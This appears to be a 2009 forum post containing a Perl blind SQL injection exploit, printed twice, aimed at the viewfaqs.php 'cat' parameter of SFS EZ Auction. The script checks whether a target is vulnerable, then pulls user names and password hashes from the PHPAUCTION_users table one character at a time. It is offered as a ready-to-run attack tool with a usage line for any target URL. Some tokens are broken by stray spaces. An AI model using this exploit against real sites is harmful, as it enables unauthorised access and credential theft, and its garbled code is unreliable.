Dimi4
30.04.2009, 14:30
SFS Auction Blind sql injection Exploit
#!/usr/bin/perl -w
use strict;
use LWP::Simple;
$| = 1;
print q {
:::::::::::::::::::::::::::::::::::::::::::::::::: :
:: SFS EZ Auction Blind sql injection exploit ::
:: written by Dimi4 ::
:::::::::::::::::::::::::::::::::::::::::::::::::: :
[~] Greetz:
[~] UASC uasc.org.ua
[~] ANTICHAT forum.antichat.ru
};
if (@ARGV < 1) {
print "Usage: perl exploit.pl [url] \nExample: perl exploit.pl www.target.com/demo\n";
exit;
}
my $page = shift;
my $uid = shift;
my $prefix;
my @charset = ('a','b','c','d','e','f','g','h','i','j','k','l',' m','n','o','p','q','r','s','t','u','v','w','x','y' ,'z','A','B','C','D','E','F','G','H','I','J','K',' L','M','N','O','P','Q','R','S','T','U','V','W','X' ,'Y','Z','0','1','2','3','4','5','6','7','8','9',' :');
print "[x] Vulnerability check...\n";
my $chreq = get("http://".$page."/viewfaqs.php?cat=1+and+1=0");
if (($chreq =~ m/DWarning/i) || ($chreq =~ m/mysql_result()/i)) {
print "[x] Seems to be vulnerable!\n";
} else {
print "[o] Seems to be patched, sorry\n";
exit;
}
print "[+] Getting hash...\n";
print "[+] Hash: ";
my $curnum = 1;
while($curnum < 62) {
my $false_result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring(ver sion(),".$curnum.",1))=-1");
foreach(@charset) {
my $ascode = ord($_);
my $result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring((SE LECT+concat_ws(0x3a,name,password)+from+PHPAUCTION _users),".$curnum.",1))=".$ascode);
if (length($result) != 0) {
if (length($result) != length($false_result)) {
print chr($ascode);
$curnum++;
}
}
}
}
print "\n[+] Done!\n";
#!/usr/bin/perl -w
use strict;
use LWP::Simple;
$| = 1;
print q {
:::::::::::::::::::::::::::::::::::::::::::::::::: :
:: SFS EZ Auction Blind sql injection exploit ::
:: written by Dimi4 ::
:::::::::::::::::::::::::::::::::::::::::::::::::: :
[~] Greetz:
[~] UASC uasc.org.ua
[~] ANTICHAT forum.antichat.ru
};
if (@ARGV < 1) {
print "Usage: perl exploit.pl [url] \nExample: perl exploit.pl www.target.com/demo\n";
exit;
}
my $page = shift;
my $uid = shift;
my $prefix;
my @charset = ('a','b','c','d','e','f','g','h','i','j','k','l',' m','n','o','p','q','r','s','t','u','v','w','x','y' ,'z','A','B','C','D','E','F','G','H','I','J','K',' L','M','N','O','P','Q','R','S','T','U','V','W','X' ,'Y','Z','0','1','2','3','4','5','6','7','8','9',' :');
print "[x] Vulnerability check...\n";
my $chreq = get("http://".$page."/viewfaqs.php?cat=1+and+1=0");
if (($chreq =~ m/DWarning/i) || ($chreq =~ m/mysql_result()/i)) {
print "[x] Seems to be vulnerable!\n";
} else {
print "[o] Seems to be patched, sorry\n";
exit;
}
print "[+] Getting hash...\n";
print "[+] Hash: ";
my $curnum = 1;
while($curnum < 62) {
my $false_result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring(ver sion(),".$curnum.",1))=-1");
foreach(@charset) {
my $ascode = ord($_);
my $result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring((SE LECT+concat_ws(0x3a,name,password)+from+PHPAUCTION _users),".$curnum.",1))=".$ascode);
if (length($result) != 0) {
if (length($result) != length($false_result)) {
print chr($ascode);
$curnum++;
}
}
}
}
print "\n[+] Done!\n";